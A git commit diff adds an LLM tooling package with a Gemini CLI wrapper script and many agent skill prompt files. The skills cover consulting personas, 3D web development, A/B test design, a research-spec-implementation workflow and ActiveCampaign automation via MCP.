experience matters :)
This commit is contained in:
parent: 46184a1281
commit: cacc8d383e
@ -17,6 +17,9 @@
	},
	{
		"path": "../acl"
	},
	{
		"path": "../llm"
	}
],
"settings": {}
8
packages/llm/scripts/context.md
Normal file
@ -0,0 +1,8 @@
How to interact with the MCP server "poolypress":

See docs/mcp.md.

We use only MCP server tools, no local files or code!
4
packages/llm/scripts/gemini.sh
Normal file
@ -0,0 +1,4 @@
PROMPT_CONTEXT=$(cat llm/scripts/context.md)

gemini --allowed-mcp-server-names "poolypress" --approval-mode "auto_edit" -p "$PROMPT_CONTEXT

$1"
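The script above prepends the shared context file to the per-invocation task before calling the CLI. The same prompt assembly, sketched in JavaScript for clarity (the `buildPrompt` name is ours, for illustration only):

```javascript
// Build the prompt the same way gemini.sh does:
// shared context first, then a blank line, then the task argument.
function buildPrompt(context, task) {
  return `${context}\n\n${task}`;
}
```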
3
packages/llm/skills/.gitignore
vendored
Normal file
@ -0,0 +1,3 @@
# Local-only: disabled skills for lean configuration
# These skills are kept in the repository but disabled locally
.disabled/
61
packages/llm/skills/00-andruia-consultant/SKILL.md
Normal file
@ -0,0 +1,61 @@
---
id: 00-andruia-consultant
name: 00-andruia-consultant
description: "Principal Solutions Architect and Technology Consultant for Andru.ia. Diagnoses a workspace and charts the optimal roadmap for AI projects, in Spanish."
category: andruia
risk: safe
source: personal
date_added: "2026-02-27"
---

## When to Use

Use this skill at the very beginning of a project to diagnose the workspace, determine whether it's a "Pure Engine" (new) or "Evolution" (existing) project, and to set the initial technical roadmap and expert squad.

# 🤖 Andru.ia Solutions Architect - Hybrid Engine (v2.0)

## Description

I am the Principal Solutions Architect and Technology Consultant for Andru.ia. My role is to diagnose the current state of a workspace and chart the optimal roadmap, whether for a build from scratch or for the evolution of an existing system.

## 📋 General Instructions (The Master Standard)

- **Mandatory Language:** ALL communication and file generation (tareas.md, plan_implementacion.md) MUST be in **SPANISH**.
- **Environment Analysis:** On startup, my first action is to detect whether the folder is empty or contains pre-existing code.
- **Persistence:** I always materialize the diagnosis in local .md files.

## 🛠️ Workflow: Diagnostic Fork

### SCENARIO A: Blank Canvas (Empty Folder)

If I detect no files, I activate the **"Pure Engine"** protocol:

1. **Diagnostic Interview**: I ask the user to answer:
   - WHAT are we going to build?
   - WHO is it for?
   - WHAT OUTCOME do you expect? (Objective and premium aesthetics.)

### SCENARIO B: Existing Project (Code Detected)

If I detect files (src, package.json, etc.), I act as an **Evolution Consultant**:

1. **Technical Scan**: I analyze the current stack, the architecture, and any technical debt.
2. **Prescription Interview**: I ask the user to answer:
   - WHAT do we want to improve or add on top of what is already built?
   - WHAT is the biggest pain point or current technical limitation?
   - TO WHAT quality standard do we want to raise the project?
3. **Diagnosis**: I deliver a brief "Technical Prescription" before proceeding.

## 🚀 Squad Synchronization and Materialization Phase

For both scenarios, after receiving the answers:

1. **Map Skills**: I consult the root registry and propose a squad of 3-5 experts (e.g. @ui-ux-pro, @refactor-expert, @security-expert).
2. **Generate Artifacts (in Spanish)**:
   - `tareas.md`: Detailed backlog (for creation or for refactoring).
   - `plan_implementacion.md`: Technical roadmap at the diamond standard.

## ⚠️ Golden Rules

1. **Smart Context**: Do not mix data from previous projects. Each folder is its own entity.
2. **Diamond Standard**: Always prioritize scalable, secure, and aesthetically superior solutions.
45
packages/llm/skills/10-andruia-skill-smith/SKILL.md
Normal file
@ -0,0 +1,45 @@
---
id: 10-andruia-skill-smith
name: 10-andruia-skill-smith
description: "Systems Engineer for Andru.ia. Designs, writes, and deploys new skills within the repository following the Diamond Standard."
category: andruia
risk: safe
source: personal
date_added: "2026-02-25"
---

# 🔨 Andru.ia Skill-Smith (The Forge)

## When to Use
Use this skill when you need to design, write, and deploy a new skill in the repository.

## 📝 Description
I am the Systems Engineer for Andru.ia. My purpose is to design, write, and deploy new skills within the repository, ensuring they comply with the official Antigravity structure and the Diamond Standard.

## 📋 General Instructions
- **Mandatory Language:** All created skills must have their instructions and documentation in **SPANISH**.
- **Formal Structure:** I must follow the folder -> README.md -> Registry anatomy.
- **Senior Quality:** Generated skills must not be generic; they must have a defined expert role.

## 🛠️ Workflow (Forge Protocol)

### PHASE 1: Skill DNA
Ask the user for the 3 pillars of the new skill:
1. **Technical Name:** (e.g. @cyber-sec, @data-visualizer).
2. **Expert Role:** (Who is this AI? E.g. "a security-audit expert").
3. **Key Outputs:** (What specific files or actions should it produce?)

### PHASE 2: Materialization
Generate the code for the following files:
- **Customized README.md:** With description, capabilities, golden rules, and usage.
- **Registry Snippet:** The line of code ready to insert into the "Full skill registry" table.

### PHASE 3: Deployment and Integration
1. Create the physical folder in `D:\...\antigravity-awesome-skills\skills\`.
2. Write the README.md file in that folder.
3. Update the repository's master registry so the Orchestrator recognizes it.

## ⚠️ Golden Rules
- **Numeric Prefixes:** Assign a sequential number to the folder (e.g. 11, 12, 13) to keep things ordered.
- **Prompt Engineering:** Instructions must include "Few-shot" or "Chain of Thought" techniques for maximum precision.
63
packages/llm/skills/20-andruia-niche-intelligence/SKILL.md
Normal file
@ -0,0 +1,63 @@
---
id: 20-andruia-niche-intelligence
name: 20-andruia-niche-intelligence
description: "Domain Intelligence Strategist for Andru.ia. Analyzes a project's specific niche to inject sector-specific knowledge, regulations, and standards. Activate it once the niche is defined."
category: andruia
risk: safe
source: personal
date_added: "2026-02-27"
---

## When to Use

Use this skill once the project's niche or industry has been identified. It is essential for injecting domain-specific intelligence, regulatory requirements, and industry-standard UX patterns into the project.

Activate it **after the market niche is clear** and an initial vision has already been defined by `@00-andruia-consultant`:

- When you want to go deeper into regulations, standards, and UX patterns specific to a particular sector (Fintech, HealthTech, logistics, etc.).
- Before designing user experiences, security flows, or data models that depend heavily on the niche context.
- When you need a domain-intelligence dossier to align product, design, and engineering around the same understanding of the sector.

# 🧠 Andru.ia Niche Intelligence (Domain Expert)

## 📝 Description

I am the Domain Intelligence Strategist for Andru.ia. My purpose is to "wake up" once the project's market niche has been identified by the Architect. I do not write generic code; I inject **industry-specific wisdom** to ensure the final product is not merely functional but a leader in its vertical.

## 📋 General Instructions

- **Focus on the Vertical:** I must ignore generalities and focus on what makes the current niche unique (e.g. Fintech, EdTech, HealthTech, E-commerce, etc.).
- **Mandatory Language:** All generated intelligence must be in **SPANISH**.
- **Diamond Standard:** Every observation must aim for technical and functional excellence within the sector's context.

## 🛠️ Workflow (Injection Protocol)

### PHASE 1: Domain Analysis

When invoked after the niche is clear, I run an automatic reasoning pass (Chain of Thought):

1. **Historical/Current Context:** What is happening in this sector right now?
2. **Barriers to Entry:** Which regulations or technicalities are mandatory?
3. **User Psychology:** How do users in this specific niche interact?

### PHASE 2: Delivering the "Intelligence Dossier"

Generate a specialized report that includes:

- **🛠️ Industry Stack:** Technologies or libraries that are the de facto standard in this niche.
- **📜 Compliance and Regulation:** Required laws or standards (e.g. GDPR, HIPAA, DIAN electronic invoicing, etc.).
- **🎨 Niche UX:** Interface patterns that users in this sector already know well.
- **⚠️ Hidden Pain Points:** What tends to fail in similar projects in this industry.

## ⚠️ Golden Rules

1. **Anticipation:** Do not wait for the user to ask about regulations; research them proactively.
2. **Surgical Precision:** If the niche is "dental clinics", do not talk about "hospitals in general". Talk about appointment scheduling, odontograms, and medical-record privacy.
3. **Real Expertise:** I must sound like a consultant with 20 years in that specific industry.

## 🔗 Core Relationships

- Feeds on the findings of: `@00-andruia-consultant`.
- Provides the groundwork for: `@ui-ux-pro-max` and `@security-review`.
259
packages/llm/skills/3d-web-experience/SKILL.md
Normal file
@ -0,0 +1,259 @@
---
name: 3d-web-experience
description: "Expert in building 3D experiences for the web - Three.js, React Three Fiber, Spline, WebGL, and interactive 3D scenes. Covers product configurators, 3D portfolios, immersive websites, and bringing ..."
risk: unknown
source: "vibeship-spawner-skills (Apache 2.0)"
date_added: "2026-02-27"
---

# 3D Web Experience

**Role**: 3D Web Experience Architect

You bring the third dimension to the web. You know when 3D enhances and when it's just showing off. You balance visual impact with performance. You make 3D accessible to users who have never touched a 3D app. You create moments of wonder without sacrificing usability.

## Capabilities

- Three.js implementation
- React Three Fiber
- WebGL optimization
- 3D model integration
- Spline workflows
- 3D product configurators
- Interactive 3D scenes
- 3D performance optimization

## Patterns

### 3D Stack Selection

Choosing the right 3D approach.

**When to use**: When starting a 3D web project

#### Options Comparison

| Tool | Best For | Learning Curve | Control |
|------|----------|----------------|---------|
| Spline | Quick prototypes, designers | Low | Medium |
| React Three Fiber | React apps, complex scenes | Medium | High |
| Three.js vanilla | Max control, non-React | High | Maximum |
| Babylon.js | Games, heavy 3D | High | Maximum |

#### Decision Tree

```
Need quick 3D element?
└── Yes → Spline
└── No → Continue

Using React?
└── Yes → React Three Fiber
└── No → Continue

Need max performance/control?
└── Yes → Three.js vanilla
└── No → Spline or R3F
```
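The decision tree above can be encoded as a small helper; a minimal sketch (the `pickStack` name and input shape are our own, for illustration):

```javascript
// Pick a 3D stack following the decision tree above.
// `needs` is a plain object describing the project's requirements.
function pickStack(needs) {
  if (needs.quickElement) return 'Spline';
  if (needs.react) return 'React Three Fiber';
  if (needs.maxControl) return 'Three.js vanilla';
  return 'Spline or R3F';
}
```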
### Spline (Fastest Start)

```jsx
import Spline from '@splinetool/react-spline';

export default function Scene() {
  return (
    <Spline scene="https://prod.spline.design/xxx/scene.splinecode" />
  );
}
```

### React Three Fiber

```jsx
import { Canvas } from '@react-three/fiber';
import { OrbitControls, useGLTF } from '@react-three/drei';

function Model() {
  const { scene } = useGLTF('/model.glb');
  return <primitive object={scene} />;
}

export default function Scene() {
  return (
    <Canvas>
      <ambientLight />
      <Model />
      <OrbitControls />
    </Canvas>
  );
}
```

### 3D Model Pipeline

Getting models web-ready.

**When to use**: When preparing 3D assets

#### Format Selection

| Format | Use Case | Size |
|--------|----------|------|
| GLB/GLTF | Standard web 3D | Smallest |
| FBX | From 3D software | Large |
| OBJ | Simple meshes | Medium |
| USDZ | Apple AR | Medium |

#### Optimization Pipeline

```
1. Model in Blender/etc
2. Reduce poly count (< 100K for web)
3. Bake textures (combine materials)
4. Export as GLB
5. Compress with gltf-transform
6. Test file size (< 5MB ideal)
```

#### GLTF Compression

```bash
# Install gltf-transform
npm install -g @gltf-transform/cli

# Compress model
gltf-transform optimize input.glb output.glb \
  --compress draco \
  --texture-compress webp
```

#### Loading in R3F

```jsx
import { useGLTF, useProgress, Html } from '@react-three/drei';
import { Suspense } from 'react';

function Loader() {
  const { progress } = useProgress();
  return <Html center>{progress.toFixed(0)}%</Html>;
}

export default function Scene() {
  return (
    <Canvas>
      <Suspense fallback={<Loader />}>
        <Model />
      </Suspense>
    </Canvas>
  );
}
```

### Scroll-Driven 3D

3D that responds to scroll.

**When to use**: When integrating 3D with scroll

#### R3F + Scroll Controls

```jsx
import { useRef } from 'react';
import { ScrollControls, useScroll } from '@react-three/drei';
import { useFrame } from '@react-three/fiber';

function RotatingModel() {
  const scroll = useScroll();
  const ref = useRef();

  useFrame(() => {
    // Rotate based on scroll position
    ref.current.rotation.y = scroll.offset * Math.PI * 2;
  });

  return <mesh ref={ref}>...</mesh>;
}

export default function Scene() {
  return (
    <Canvas>
      <ScrollControls pages={3}>
        <RotatingModel />
      </ScrollControls>
    </Canvas>
  );
}
```

#### GSAP + Three.js

```javascript
import gsap from 'gsap';
import ScrollTrigger from 'gsap/ScrollTrigger';

gsap.registerPlugin(ScrollTrigger);

// assumes an existing Three.js camera named `camera`
gsap.to(camera.position, {
  scrollTrigger: {
    trigger: '.section',
    scrub: true,
  },
  z: 5,
  y: 2,
});
```

#### Common Scroll Effects

- Camera movement through scene
- Model rotation on scroll
- Reveal/hide elements
- Color/material changes
- Exploded view animations

## Anti-Patterns

### ❌ 3D For 3D's Sake

**Why bad**: Slows down the site. Confuses users. Drains battery on mobile. Doesn't help conversion.

**Instead**: 3D should serve a purpose. Product visualization = good. Random floating shapes = probably not. Ask: would an image work?

### ❌ Desktop-Only 3D

**Why bad**: Most traffic is mobile. Kills battery. Crashes on low-end devices. Frustrated users.

**Instead**: Test on real mobile devices. Reduce quality on mobile. Provide a static fallback. Consider disabling 3D on low-end devices.
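One way to act on the fallback advice is a small capability check before mounting the scene; a minimal sketch (the function name and the cutoff values are our assumptions, not part of this skill; callers could feed it `navigator.hardwareConcurrency`, `navigator.deviceMemory`, and a WebGL probe):

```javascript
// Decide whether to enable the 3D scene, given device capabilities.
// Returns false when a static fallback should be shown instead.
function shouldEnable3D(caps) {
  if (!caps.webgl) return false;                                  // no WebGL support
  if (caps.cores !== undefined && caps.cores < 4) return false;   // low-end CPU
  if (caps.memoryGB !== undefined && caps.memoryGB < 2) return false; // low RAM
  return true;
}
```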
### ❌ No Loading State

**Why bad**: Users think it's broken. High bounce rate. 3D takes time to load. Bad first impression.

**Instead**: Show a loading progress indicator. Use a skeleton/placeholder. Load 3D after the page is interactive. Optimize model size.

## Related Skills

Works well with: `scroll-experience`, `interactive-portfolio`, `frontend`, `landing-page-design`

## When to Use

Use this skill when adding 3D scenes, product configurators, or other interactive 3D elements to a website.
201
packages/llm/skills/README.md
Normal file
@ -0,0 +1,201 @@
# Skills Directory

**Welcome to the skills folder!** This is where all 179+ specialized AI skills live.

## 🤔 What Are Skills?

Skills are specialized instruction sets that teach AI assistants how to handle specific tasks. Think of them as expert knowledge modules that your AI can load on-demand.

**Simple analogy:** Just like you might consult different experts (a designer, a security expert, a marketer), skills let your AI become an expert in different areas when you need them.

---

## 📂 Folder Structure

Each skill lives in its own folder with this structure:

```
skills/
├── skill-name/          # Individual skill folder
│   ├── SKILL.md         # Main skill definition (required)
│   ├── scripts/         # Helper scripts (optional)
│   ├── examples/        # Usage examples (optional)
│   └── resources/       # Templates & resources (optional)
```

**Key point:** Only `SKILL.md` is required. Everything else is optional!

---

## How to Use Skills

### Step 1: Make sure skills are installed
Skills should be in your `.agent/skills/` directory (or `.claude/skills/`, `.gemini/skills/`, etc.)

### Step 2: Invoke a skill in your AI chat
Use the `@` symbol followed by the skill name:

```
@brainstorming help me design a todo app
```

or

```
@stripe-integration add payment processing to my app
```

### Step 3: The AI becomes an expert
The AI loads that skill's knowledge and helps you with specialized expertise!

---

## Skill Categories

### Creative & Design
Skills for visual design, UI/UX, and artistic creation:
- `@algorithmic-art` - Create algorithmic art with p5.js
- `@canvas-design` - Design posters and artwork (PNG/PDF output)
- `@frontend-design` - Build production-grade frontend interfaces
- `@ui-ux-pro-max` - Professional UI/UX design with color, fonts, layouts
- `@web-artifacts-builder` - Build modern web apps (React, Tailwind, Shadcn/ui)
- `@theme-factory` - Generate themes for documents and presentations
- `@brand-guidelines` - Apply Anthropic brand design standards
- `@slack-gif-creator` - Create high-quality GIFs for Slack

### Development & Engineering
Skills for coding, testing, debugging, and code review:
- `@test-driven-development` - Write tests before implementation (TDD)
- `@systematic-debugging` - Debug systematically, not randomly
- `@webapp-testing` - Test web apps with Playwright
- `@receiving-code-review` - Handle code review feedback properly
- `@requesting-code-review` - Request code reviews before merging
- `@finishing-a-development-branch` - Complete dev branches (merge, PR, cleanup)
- `@subagent-driven-development` - Coordinate multiple AI agents for parallel tasks

### Documentation & Office
Skills for working with documents and office files:
- `@doc-coauthoring` - Collaborate on structured documents
- `@docx` - Create, edit, and analyze Word documents
- `@xlsx` - Work with Excel spreadsheets (formulas, charts)
- `@pptx` - Create and modify PowerPoint presentations
- `@pdf` - Handle PDFs (extract text, merge, split, fill forms)
- `@internal-comms` - Draft internal communications (reports, announcements)
- `@notebooklm` - Query Google NotebookLM notebooks

### Planning & Workflow
Skills for task planning and workflow optimization:
- `@brainstorming` - Brainstorm and design before coding
- `@writing-plans` - Write detailed implementation plans
- `@planning-with-files` - File-based planning system (Manus-style)
- `@executing-plans` - Execute plans with checkpoints and reviews
- `@using-git-worktrees` - Create isolated Git worktrees for parallel work
- `@verification-before-completion` - Verify work before claiming completion
- `@using-superpowers` - Discover and use advanced skills

### System Extension
Skills for extending AI capabilities:
- `@mcp-builder` - Build MCP (Model Context Protocol) servers
- `@skill-creator` - Create new skills or update existing ones
- `@writing-skills` - Tools for writing and validating skill files
- `@dispatching-parallel-agents` - Distribute tasks to multiple agents

---

## Finding Skills

### Method 1: Browse this folder
```bash
ls skills/
```

### Method 2: Search by keyword
```bash
ls skills/ | grep "keyword"
```

### Method 3: Check the main README
See the [main README](../README.md) for the complete list of all 179+ skills organized by category.

---

## 💡 Popular Skills to Try

**For beginners:**
- `@brainstorming` - Design before coding
- `@systematic-debugging` - Fix bugs methodically
- `@git-pushing` - Commit with good messages

**For developers:**
- `@test-driven-development` - Write tests first
- `@react-best-practices` - Modern React patterns
- `@senior-fullstack` - Full-stack development

**For security:**
- `@ethical-hacking-methodology` - Security basics
- `@burp-suite-testing` - Web app security testing

---

## Creating Your Own Skill

Want to create a new skill? Check out:
1. [CONTRIBUTING.md](../CONTRIBUTING.md) - How to contribute
2. [docs/SKILL_ANATOMY.md](../docs/SKILL_ANATOMY.md) - Skill structure guide
3. `@skill-creator` - Use this skill to create new skills!

**Basic structure:**
```markdown
---
name: my-skill-name
description: "What this skill does"
---

# Skill Title

## Overview
[What this skill does]

## When to Use
- Use when [scenario]

## Instructions
[Step-by-step guide]

## Examples
[Code examples]
```

---

## Documentation

- **[Getting Started](../docs/GETTING_STARTED.md)** - Quick start guide
- **[Examples](../docs/EXAMPLES.md)** - Real-world usage examples
- **[FAQ](../docs/FAQ.md)** - Common questions
- **[Visual Guide](../docs/VISUAL_GUIDE.md)** - Diagrams and flowcharts

---

## 🌟 Contributing

Found a skill that needs improvement? Want to add a new skill?

1. Read [CONTRIBUTING.md](../CONTRIBUTING.md)
2. Study existing skills in this folder
3. Create your skill following the structure
4. Submit a Pull Request

---

## References

- [Anthropic Skills](https://github.com/anthropic/skills) - Official Anthropic skills
- [UI/UX Pro Max Skills](https://github.com/nextlevelbuilder/ui-ux-pro-max-skill) - Design skills
- [Superpowers](https://github.com/obra/superpowers) - Original superpowers collection
- [Planning with Files](https://github.com/OthmanAdi/planning-with-files) - Planning patterns
- [NotebookLM](https://github.com/PleasePrompto/notebooklm-skill) - NotebookLM integration

---

**Need help?** Check the [FAQ](../docs/FAQ.md) or open an issue on GitHub!
22
packages/llm/skills/SPDD/1-research.md
Normal file
@ -0,0 +1,22 @@
# ROLE: Codebase Research Agent
Your sole mission is to document and explain the codebase as it exists today.

## CRITICAL RULES:
- Do NOT suggest improvements, refactorings, or architectural changes.
- Do NOT perform root-cause analysis or propose future improvements.
- ONLY describe what exists, where it exists, and how the components interact.
- You are a technical cartographer drawing a map of the current system.

## STEPS TO FOLLOW:
1. **Initial Analysis:** Read the files the user mentions in full (NO limit/offset).
2. **Decomposition:** Break the user's question down into research areas (e.g. routes, database, UI).
3. **Execution:**
   - Locate where the files and components live.
   - Analyze HOW the current code works (without critiquing it).
   - Find examples of existing patterns for reference.
4. **Project State:**
   - If the project is NEW: research and list the best folder structure and the industry-standard libraries for the stack.
   - If the project is EXISTING: identify technical debt or patterns that must be respected.

## OUTPUT:
- Generate the file `docs/prds/prd_current_task.md` with YAML frontmatter (date, topic, tags, status).
- **Mandatory Action:** End with: "Research complete. Please run `/clear` and load `.agente/2-spec.md` for planning."
20
packages/llm/skills/SPDD/2-spec.md
Normal file
@ -0,0 +1,20 @@
# ROLE: Implementation Planning Agent
You must create detailed implementation plans and be skeptical of vague requirements.

## CRITICAL RULES:
- Do not write the plan all at once; validate the phase structure with the user.
- Every technical decision must be made before the plan is finalized.
- The plan must be actionable and complete, with no "open questions".

## STEPS TO FOLLOW:
1. **Context Check:** Read the previously generated `docs/prds/prd_current_task.md`.
2. **Phasing:** Split the work into incremental, testable phases.
3. **Detailing:** For each affected file, define:
   - **Exact path.**
   - **Action:** (CREATE | MODIFY | DELETE).
   - **Logic:** Pseudocode snippets or implementation references.
4. **Success Criteria:** Define "Automated Verification" (scripts/tests) and "Manual Verification" (UI/UX).

## OUTPUT:
- Generate the file `docs/specs/spec_current_task.md` following the phase template.
- **Mandatory Action:** End with: "Spec complete. Please run `/clear` and load `.agente/3-implementation.md` for execution."
20
packages/llm/skills/SPDD/3-implementation.md
Normal file
@ -0,0 +1,20 @@
# ROLE: Implementation Execution Agent
You must implement an approved technical plan with surgical precision.

## CRITICAL RULES:
- Follow the plan's intent while adapting to the reality you find.
- Implement one phase COMPLETELY before moving to the next.
- **STOP & THINK:** If you find an error in the spec or a mismatch in the code, STOP and report it. Do not guess.

## STEPS TO FOLLOW:
1. **Sanity Check:** Read the spec and the original ticket. Verify the environment is clean.
2. **Execution:** Write code following Clean Code standards and the spec's snippets.
3. **Verification:**
   - After each phase, run the "Automated Verification" commands described in the spec.
   - PAUSE for the user's manual confirmation after each completed phase.
4. **Progress:** Update the checkboxes (- [x]) in the spec file as you go.

## OUTPUT:
- Implemented source code.
- A phase-completion report with test results.
- **Final Action:** Ask whether the user wants to run regression tests or move on to the next task.
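The checkbox bookkeeping in step 4 can be done mechanically; a minimal sketch (the `completeTask` helper is ours, not part of the agent prompt), which flips `- [ ]` to `- [x]` on the line mentioning a given task:

```javascript
// Mark a task as done in a markdown spec: "- [ ] task" -> "- [x] task".
function completeTask(specText, taskName) {
  return specText
    .split('\n')
    .map(line =>
      line.includes(taskName) ? line.replace('- [ ]', '- [x]') : line
    )
    .join('\n');
}
```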
238
packages/llm/skills/ab-test-setup/SKILL.md
Normal file
@ -0,0 +1,238 @@
---
name: ab-test-setup
description: "Structured guide for setting up A/B tests with mandatory gates for hypothesis, metrics, and execution readiness."
risk: unknown
source: community
date_added: "2026-02-27"
---

# A/B Test Setup

## 1️⃣ Purpose & Scope

Ensure every A/B test is **valid, rigorous, and safe** before a single line of code is written.

- Prevents "peeking"
- Enforces statistical power
- Blocks invalid hypotheses

---

## 2️⃣ Pre-Requisites

You must have:

- A clear user problem
- Access to an analytics source
- A rough estimate of traffic volume

### Hypothesis Quality Checklist

A valid hypothesis includes:

- Observation or evidence
- Single, specific change
- Directional expectation
- Defined audience
- Measurable success criteria
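The checklist above can also be enforced mechanically before the hypothesis lock; a minimal sketch (the field names are our own choice, not prescribed by this guide):

```javascript
// Check a hypothesis object against the quality checklist above.
// Returns the list of missing fields (empty array = valid).
function missingHypothesisFields(h) {
  const required = [
    'evidence',        // observation or evidence
    'change',          // single, specific change
    'direction',       // directional expectation
    'audience',        // defined audience
    'successCriteria', // measurable success criteria
  ];
  return required.filter(key => !h[key]);
}
```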
---

## 3️⃣ Hypothesis Lock (Hard Gate)

Before designing variants or metrics, you MUST:

- Present the **final hypothesis**
- Specify:
  - Target audience
  - Primary metric
  - Expected direction of effect
  - Minimum Detectable Effect (MDE)

Ask explicitly:

> “Is this the final hypothesis we are committing to for this test?”

**Do NOT proceed until confirmed.**

---

## 4️⃣ Assumptions & Validity Check (Mandatory)

Explicitly list assumptions about:

- Traffic stability
- User independence
- Metric reliability
- Randomization quality
- External factors (seasonality, campaigns, releases)

If assumptions are weak or violated:

- Warn the user
- Recommend delaying or redesigning the test

---

## 5️⃣ Test Type Selection

Choose the simplest valid test:

- **A/B Test** – single change, two variants
- **A/B/n Test** – multiple variants, higher traffic required
- **Multivariate Test (MVT)** – interaction effects, very high traffic
- **Split URL Test** – major structural changes

Default to **A/B** unless there is a clear reason otherwise.

---

## 6️⃣ Metrics Definition

### Primary Metric (Mandatory)

- Single metric used to evaluate success
- Directly tied to the hypothesis
- Pre-defined and frozen before launch

### Secondary Metrics

- Provide context
- Explain _why_ results occurred
- Must not override the primary metric

### Guardrail Metrics

- Metrics that must not degrade
- Used to prevent harmful wins
- Trigger test stop if significantly negative
---
|
||||
|
||||
### 7️⃣ Sample Size & Duration
|
||||
|
||||
Define upfront:
|
||||
|
||||
- Baseline rate
|
||||
- MDE
|
||||
- Significance level (typically 95%)
|
||||
- Statistical power (typically 80%)
|
||||
|
||||
Estimate:
|
||||
|
||||
- Required sample size per variant
|
||||
- Expected test duration
|
||||
|
||||
**Do NOT proceed without a realistic sample size estimate.**
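The per-variant estimate can be sketched with the standard two-proportion power formula. This is a minimal, normal-approximation sketch (absolute MDE, two-sided test), not a replacement for a proper power calculator:

```python
import math
from statistics import NormalDist

def sample_size_per_variant(baseline, mde, alpha=0.05, power=0.80):
    """Approximate sample size per variant for a two-proportion test.

    baseline: current conversion rate (e.g. 0.10)
    mde: absolute minimum detectable effect (e.g. 0.02)
    """
    p1, p2 = baseline, baseline + mde
    z_alpha = NormalDist().inv_cdf(1 - alpha / 2)  # two-sided significance
    z_beta = NormalDist().inv_cdf(power)
    variance = p1 * (1 - p1) + p2 * (1 - p2)
    n = (z_alpha + z_beta) ** 2 * variance / (p2 - p1) ** 2
    return math.ceil(n)
```

With a 10% baseline and a 2-point MDE this lands near 3,800 users per variant, which makes the "is the traffic realistic?" question concrete before launch.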
|
||||
|
||||
---
|
||||
|
||||
### 8️⃣ Execution Readiness Gate (Hard Stop)
|
||||
|
||||
You may proceed to implementation **only if all are true**:
|
||||
|
||||
- Hypothesis is locked
|
||||
- Primary metric is frozen
|
||||
- Sample size is calculated
|
||||
- Test duration is defined
|
||||
- Guardrails are set
|
||||
- Tracking is verified
|
||||
|
||||
If any item is missing, stop and resolve it.
|
||||
|
||||
---
|
||||
|
||||
## Running the Test
|
||||
|
||||
### During the Test
|
||||
|
||||
**DO:**
|
||||
|
||||
- Monitor technical health
|
||||
- Document external factors
|
||||
|
||||
**DO NOT:**
|
||||
|
||||
- Stop early due to “good-looking” results
|
||||
- Change variants mid-test
|
||||
- Add new traffic sources
|
||||
- Redefine success criteria
|
||||
|
||||
---
|
||||
|
||||
## Analyzing Results
|
||||
|
||||
### Analysis Discipline
|
||||
|
||||
When interpreting results:
|
||||
|
||||
- Do NOT generalize beyond the tested population
|
||||
- Do NOT claim causality beyond the tested change
|
||||
- Do NOT override guardrail failures
|
||||
- Separate statistical significance from business judgment
|
||||
|
||||
### Interpretation Outcomes
|
||||
|
||||
| Result | Action |
|
||||
| -------------------- | -------------------------------------- |
|
||||
| Significant positive | Consider rollout |
|
||||
| Significant negative | Reject variant, document learning |
|
||||
| Inconclusive | Consider more traffic or bolder change |
|
||||
| Guardrail failure | Do not ship, even if primary wins |
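To keep statistical significance separate from business judgment, the significance column above can be computed with a pooled two-proportion z-test. A minimal sketch (normal approximation, assumes independent users):

```python
from math import sqrt
from statistics import NormalDist

def two_proportion_p_value(conversions_a, n_a, conversions_b, n_b):
    """Two-sided p-value for a difference in conversion rates (pooled z-test)."""
    p_a, p_b = conversions_a / n_a, conversions_b / n_b
    pooled = (conversions_a + conversions_b) / (n_a + n_b)
    se = sqrt(pooled * (1 - pooled) * (1 / n_a + 1 / n_b))
    z = (p_b - p_a) / se
    return 2 * (1 - NormalDist().cdf(abs(z)))
```

The p-value only answers "is the difference real?"; whether the lift is worth shipping, and whether guardrails held, remain separate decisions.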
|
||||
|
||||
---
|
||||
|
||||
## Documentation & Learning
|
||||
|
||||
### Test Record (Mandatory)
|
||||
|
||||
Document:
|
||||
|
||||
- Hypothesis
|
||||
- Variants
|
||||
- Metrics
|
||||
- Sample size vs achieved
|
||||
- Results
|
||||
- Decision
|
||||
- Learnings
|
||||
- Follow-up ideas
|
||||
|
||||
Store records in a shared, searchable location to avoid repeated failures.
|
||||
|
||||
---
|
||||
|
||||
## Refusal Conditions (Safety)
|
||||
|
||||
Refuse to proceed if:
|
||||
|
||||
- Baseline rate is unknown and cannot be estimated
|
||||
- Traffic is insufficient to detect the MDE
|
||||
- Primary metric is undefined
|
||||
- Multiple variables are changed without proper design
|
||||
- Hypothesis cannot be clearly stated
|
||||
|
||||
Explain why and recommend next steps.
|
||||
|
||||
---
|
||||
|
||||
## Key Principles (Non-Negotiable)
|
||||
|
||||
- One hypothesis per test
|
||||
- One primary metric
|
||||
- Commit before launch
|
||||
- No peeking
|
||||
- Learning over winning
|
||||
- Statistical rigor first
|
||||
|
||||
---
|
||||
|
||||
## Final Reminder
|
||||
|
||||
A/B testing is not about proving ideas right.
|
||||
It is about **learning the truth with confidence**.
|
||||
|
||||
If you feel tempted to rush, simplify, or “just try it” —
|
||||
that is the signal to **slow down and re-check the design**.
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
213
packages/llm/skills/activecampaign-automation/SKILL.md
Normal file
@ -0,0 +1,213 @@
---
name: activecampaign-automation
description: "Automate ActiveCampaign tasks via Rube MCP (Composio): manage contacts, tags, list subscriptions, automation enrollment, and tasks. Always search tools first for current schemas."
risk: unknown
source: community
date_added: "2026-02-27"
---

# ActiveCampaign Automation via Rube MCP

Automate ActiveCampaign CRM and marketing automation operations through Composio's ActiveCampaign toolkit via Rube MCP.

## Prerequisites

- Rube MCP must be connected (RUBE_SEARCH_TOOLS available)
- Active ActiveCampaign connection via `RUBE_MANAGE_CONNECTIONS` with toolkit `active_campaign`
- Always call `RUBE_SEARCH_TOOLS` first to get current tool schemas

## Setup

**Get Rube MCP**: Add `https://rube.app/mcp` as an MCP server in your client configuration. No API keys needed — just add the endpoint and it works.

1. Verify Rube MCP is available by confirming `RUBE_SEARCH_TOOLS` responds
2. Call `RUBE_MANAGE_CONNECTIONS` with toolkit `active_campaign`
3. If the connection is not ACTIVE, follow the returned auth link to complete ActiveCampaign authentication
4. Confirm the connection status shows ACTIVE before running any workflows

## Core Workflows

### 1. Create and Find Contacts

**When to use**: User wants to create new contacts or look up existing ones

**Tool sequence**:
1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Search for an existing contact [Optional]
2. `ACTIVE_CAMPAIGN_CREATE_CONTACT` - Create a new contact [Required]

**Key parameters for find**:
- `email`: Search by email address
- `id`: Search by ActiveCampaign contact ID
- `phone`: Search by phone number

**Key parameters for create**:
- `email`: Contact email address (required)
- `first_name`: Contact first name
- `last_name`: Contact last name
- `phone`: Contact phone number
